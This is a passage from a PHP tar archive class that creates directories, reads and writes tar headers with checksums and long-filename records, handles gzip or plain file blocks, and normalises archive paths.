		}
		return true;
	}

	function dirCheck($dir)
	{
		$parent_dir = dirname($dir);

		if ((@is_dir($dir)) or ($dir == ''))
			return true;

		if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir)))
			return false;

		if (!mkdir($dir, 0777)) {
			$this->errors[] = __('Cannot create directory') . ' ' . $dir;
			return false;
		}
		return true;
	}

	function readHeader($binaryData, &$header)
	{
		if (strlen($binaryData) == 0) {
			$header['filename'] = '';
			return true;
		}

		if (strlen($binaryData) != 512) {
			$header['filename'] = '';
			$this->__('Invalid block size') . ': ' . strlen($binaryData);
			return false;
		}

		$checksum = 0;
		for ($i = 0; $i < 148; $i++) $checksum += ord(substr($binaryData, $i, 1));
		for ($i = 148; $i < 156; $i++) $checksum += ord(' ');
		for ($i = 156; $i < 512; $i++) $checksum += ord(substr($binaryData, $i, 1));

		$unpack_data = unpack('a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData);

		$header['checksum'] = OctDec(trim($unpack_data['checksum']));
		if ($header['checksum'] != $checksum) {
			$header['filename'] = '';
			if (($checksum == 256) && ($header['checksum'] == 0)) 	return true;
			$this->errors[] = __('Error checksum for file ') . $unpack_data['filename'];
			return false;
		}

		if (($header['typeflag'] = $unpack_data['typeflag']) == '5')	$header['size'] = 0;
		$header['filename'] = trim($unpack_data['filename']);
		$header['mode'] = OctDec(trim($unpack_data['mode']));
		$header['user_id'] = OctDec(trim($unpack_data['user_id']));
		$header['group_id'] = OctDec(trim($unpack_data['group_id']));
		$header['size'] = OctDec(trim($unpack_data['size']));
		$header['time'] = OctDec(trim($unpack_data['time']));
		return true;
	}

	function writeHeader($filename, $keep_filename)
	{
		$packF = 'a100a8a8a8a12A12';
		$packL = 'a1a100a6a2a32a32a8a8a155a12';
		if (strlen($keep_filename) <= 0) $keep_filename = $filename;
		$filename_ready = $this->makeGoodPath($keep_filename);

		if (strlen($filename_ready) > 99) {							//write long header
			$dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0);
			$dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', '');

			//  Calculate the checksum
			$checksum = 0;
			//  First part of the header
			for ($i = 0; $i < 148; $i++)
				$checksum += ord(substr($dataFirst, $i, 1));
			//  Ignore the checksum value and replace it by ' ' (space)
			for ($i = 148; $i < 156; $i++)
				$checksum += ord(' ');
			//  Last part of the header
			for ($i = 156, $j = 0; $i < 512; $i++, $j++)
				$checksum += ord(substr($dataLast, $j, 1));
			//  Write the first 148 bytes of the header in the archive
			$this->writeBlock($dataFirst, 148);
			//  Write the calculated checksum
			$checksum = sprintf('%6s ', DecOct($checksum));
			$binaryData = pack('a8', $checksum);
			$this->writeBlock($binaryData, 8);
			//  Write the last 356 bytes of the header in the archive
			$this->writeBlock($dataLast, 356);

			$tmp_filename = $this->makeGoodPath($filename_ready);

			$i = 0;
			while (($buffer = substr($tmp_filename, (($i++) * 512), 512)) != '') {
				$binaryData = pack('a512', $buffer);
				$this->writeBlock($binaryData);
			}
			return true;
		}
		$file_info = stat($filename);
		if (@is_dir($filename)) {
			$typeflag = '5';
			$size = sprintf('%11s ', DecOct(0));
		} else {
			$typeflag = '';
			clearstatcache();
			$size = sprintf('%11s ', DecOct(filesize($filename)));
		}
		$dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename))));
		$dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', '');
		$checksum = 0;
		for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1));
		for ($i = 148; $i < 156; $i++) $checksum += ord(' ');
		for ($i = 156, $j = 0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1));
		$this->writeBlock($dataFirst, 148);
		$checksum = sprintf('%6s ', DecOct($checksum));
		$binaryData = pack('a8', $checksum);
		$this->writeBlock($binaryData, 8);
		$this->writeBlock($dataLast, 356);
		return true;
	}

	function openWrite()
	{
		if ($this->isGzipped)
			$this->tmp_file = gzopen($this->archive_name, 'wb9f');
		else
			$this->tmp_file = fopen($this->archive_name, 'wb');

		if (!($this->tmp_file)) {
			$this->errors[] = __('Cannot write to file') . ' ' . $this->archive_name;
			return false;
		}
		return true;
	}

	function readBlock()
	{
		if (is_resource($this->tmp_file)) {
			if ($this->isGzipped)
				$block = gzread($this->tmp_file, 512);
			else
				$block = fread($this->tmp_file, 512);
		} else	$block = '';

		return $block;
	}

	function writeBlock($data, $length = 0)
	{
		if (is_resource($this->tmp_file)) {

			if ($length === 0) {
				if ($this->isGzipped)
					gzputs($this->tmp_file, $data);
				else
					fputs($this->tmp_file, $data);
			} else {
				if ($this->isGzipped)
					gzputs($this->tmp_file, $data, $length);
				else
					fputs($this->tmp_file, $data, $length);
			}
		}
	}

	function closeTmpFile()
	{
		if (is_resource($this->tmp_file)) {
			if ($this->isGzipped)
				gzclose($this->tmp_file);
			else
				fclose($this->tmp_file);

			$this->tmp_file = 0;
		}
	}

	function makeGoodPath($path)
	{
		if (strlen($path) > 0) {
			$path = str_replace('\\', '/', $path);
			$partPath = explode('/', $path);
			$els = count($partPath) - 1;
			for ($i = $els; $i >= 0; $i--) {
				if ($partPath[$i] == '.') {
					//  Ignore this directory
				} elseif ($partPath[$i] == '..') {
					$i--;
				} elseif (($partPath[$i] == '') and ($i != $els) and ($i != 0)) {
				} else
					$result = $partPath[$i] . ($i != $els ? '/' . $result : '');
			}
		} else $result = '';

		return $result;
	}
}